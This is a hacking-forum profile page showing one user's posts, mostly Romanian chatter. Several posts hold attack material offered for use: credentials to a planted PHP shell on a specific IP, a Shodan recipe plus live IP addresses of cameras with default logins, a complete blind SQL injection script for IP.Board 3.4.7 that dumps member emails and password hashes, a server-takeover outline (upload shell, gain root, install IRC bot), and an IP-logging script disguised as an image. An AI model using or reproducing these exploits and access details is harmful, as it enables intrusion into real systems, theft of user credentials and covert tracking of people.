Jump to content

shadowSQLi

Active Members
 View Profile  See their activity

  • Posts

    174

  • Joined

  • Last visited

 Content Type 

Everything posted by shadowSQLi

  1. shadowSQLi

    1 shell

    shadowSQLi posted a topic in Free stuff

    ======================================= sdad › ???? 157.7.234.128 - phpshell [+]Username: shadow [+]Passowrd: rstforumseboss =======================================
  2. shadowSQLi
    si de ce nu ar functiona bine niciunul dintre ele? eu folosesc de 1 an si ceva ubuntu si nu am intampinat probleme care sa nu pot fi rezolvate. [-]imi place backgroundul la elementary.
  3. shadowSQLi
    HRISTOS HAS BEEN SPAWNED -Aoleu, ce level are?
  4. shadowSQLi
    Tutorial: -Create a account on shodan.io -> login -Use dork: netwave ip camera country:"RO" city:"Timisoara" pentru a gasii orasele dintr-o tara scrieti pe google: list of cities tara si intrati pe link-ul cu wikipedia vi le va da in ordine alfabetica =================== [+]Username: admin [+]no password:D =================== Example: Ploiesti->Romania http://86.106.56.152/ Timisoara->Romania http://89.136.41.97:8080/ [+]PAKISTAN http://116.58.92.233 http://182.180.190.126:82/ http://203.128.31.49:82/ [+]UK http://50.196.204.141:81/ //`injur garda ca sormea andrada=))
  5. shadowSQLi
    poti face public configul?
  6. shadowSQLi
    e cel cu care a luat acel "h4ck3r" contul administratorului de pe vibeplay.. l-am testat si eu functioneaza bine #!/usr/bin/env python # Sunday, November 09, 2014 - secthrowaway@safe-mail.net # IP.Board <= 3.4.7 SQLi (blind, error based); # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable url = 'http://www.org/forum/' ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" import sys, re # <socks> - http://sourceforge.net/projects/socksipy/ #import socks, socket #socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) #socket.socket = socks.socksocket # </socks> import urllib2, urllib def inject(sql): try: urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e: if e.code == 503: data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE) if txt is not None: return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli)) if s < 31: return inject(sqli) else: r = '' for i in range(1, s+1, 31): r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31)) return r n = inject('SELECT COUNT(*) FROM members') print '* Found %s users' % n for j in range(int(n)): print get('member_id', 'members', j) print get('name', 'members', j) print get('email', 'members', j) print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j) print '------' source: hackforums
  7. shadowSQLi
    Hacky Easter 2015 bafta, m-am apucat si eu acum //trebuie sa scanati codul cu telefonu dupa ce rezolvati
  8. shadowSQLi
    Your order has been received. We will process your order as soon as possible, usually within 1 - 2 hours. You will get the email notification once your account get approved. Thank you for your patience! If you need to contact us about your order, please open a ticket or use online chat. thanks
  9. shadowSQLi
    daca merge de ce nu sa se foloseasca si acum?
  10. shadowSQLi
    imi poti da si mie te rog ?
  11. shadowSQLi
    vreau si eu, te rog frumos! daca mai ai
  12. shadowSQLi
    si daca permite: te loghezi o. vezi hashul de la accountul adminului daca nu-l poti sparge il inlocuiesti cu unul stiut de tine-> intri wordpress admin panel->upload shell->gain acces root->upload irc bot=))
  13. shadowSQLi
    Bine, boss..
  14. shadowSQLi
    mersi, am nimerit unul bun, aveam nevoie..
  15. shadowSQLi
    chiar este real:))
  16. shadowSQLi
    hi,hi,hi! ce imbunatatiri as putea aduce la acest script sa fie mai eficient, mai simplu de utilizat? index.php <?php #Ip(Internet Protocol) grabber for Yahoo!Messenger and other social softwares by #shadow #Version: 0.1 - beta #MA CULC ODATA CU GAINILE SI DE 1337 DE ORI CU MA-TA //show image $imagine = 'anonymous.jpg'; header('Content-Type: image/jpeg'); readfile($imagine); //mysql connect $mysql = mysqli_connect("localhost", "root", "", "test"); // verifica conexiunea if($mysql === false){ die("ERROR: Could not connect. " . mysqli_connect_error()); } //prelucreaza datele $ip = $_SERVER['REMOTE_ADDR']; //ip-ul victimei $time = date('Y-m-d H:i:s'); //data si ora la care a fost luat ip-ul $browser=""; // BROWSER if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("MSIE"))){$browser="ie";} else if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("Presto"))){$browser="opera";} else if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("CHROME"))){$browser="chrome";} else if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("SAFARI"))){$browser="safari";} else if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("FIREFOX"))){$browser="firefox";} else {$browser="other";}//browser //INSEREAZA DATELE IN BAZA DE DATE. $sql = "INSERT INTO data (ip, time, browser) VALUES ('<font color=grey><b>$ip', '<font color=grey><b>$time', '<font color=grey><b>$browser')"; if(mysqli_query($mysql, $sql)){ #SUCCES } ?> PANEL.PHP <body > <?php $db_host = 'localhost'; $db_user = 'root'; $db_pwd = ''; $database = 'test'; $table = 'data'; if (!mysql_connect($db_host, $db_user, $db_pwd)) die("Can't connect to database"); if (!mysql_select_db($database)) die("Can't select database"); // sending query $result = mysql_query("SELECT * FROM {$table}"); if (!$result) { die("Query to show fields from table failed"); } $fields_num = mysql_num_fields($result); echo "<center><table border='1'><tr>"; // printing table headers for($i=0; $i<$fields_num; $i++) { $field = mysql_fetch_field($result); echo "<td>{$field->name}</td>"; } echo "</tr>\n"; // printing table rows while($row = mysql_fetch_row($result)) { echo "<tr>"; // $row is array... foreach( .. ) puts every element // of $row to $cell variable foreach($row as $cell) echo "<td>$cell</td>"; echo "</tr>\n"; } mysql_free_result($result); ?> </body></html> m-am mai inspirat si dupa google dar nu copy/paste ci doar informativ despre functii
  17. shadowSQLi

    Salut Rst

    shadowSQLi replied to rotube's topic in Bine ai venit

    bine ai venit
  18. shadowSQLi
    Please fix the following input errors: Error e-mail or password.
  19. shadowSQLi
    ai postat in categoria gresita, metinare..
  20. shadowSQLi
    imi poti trimite si mie link-ul?
  21. shadowSQLi
    mda si cat ma plangeam la s4 de spatiu:)) ar fi o inbunatatire foarte buna chestia asta..
  22. shadowSQLi

    Salut.

    shadowSQLi replied to tricks's topic in Bine ai venit

    ar fi frumos sa postezi niste defaceuri de la site-uri ce tin din guvernul din romania si dupa sa spui numele tau real, orasul daca vrei ne poti da chiar si cnp-ul..
  23. shadowSQLi
  24. shadowSQLi
    csrf era acela cu stergerea anuntului sau banarea utilizatorului?
  25. shadowSQLi

    itshd:)

    shadowSQLi replied to io.kent's topic in Free stuff

    Invalid username or password.
×
×
  • Create New...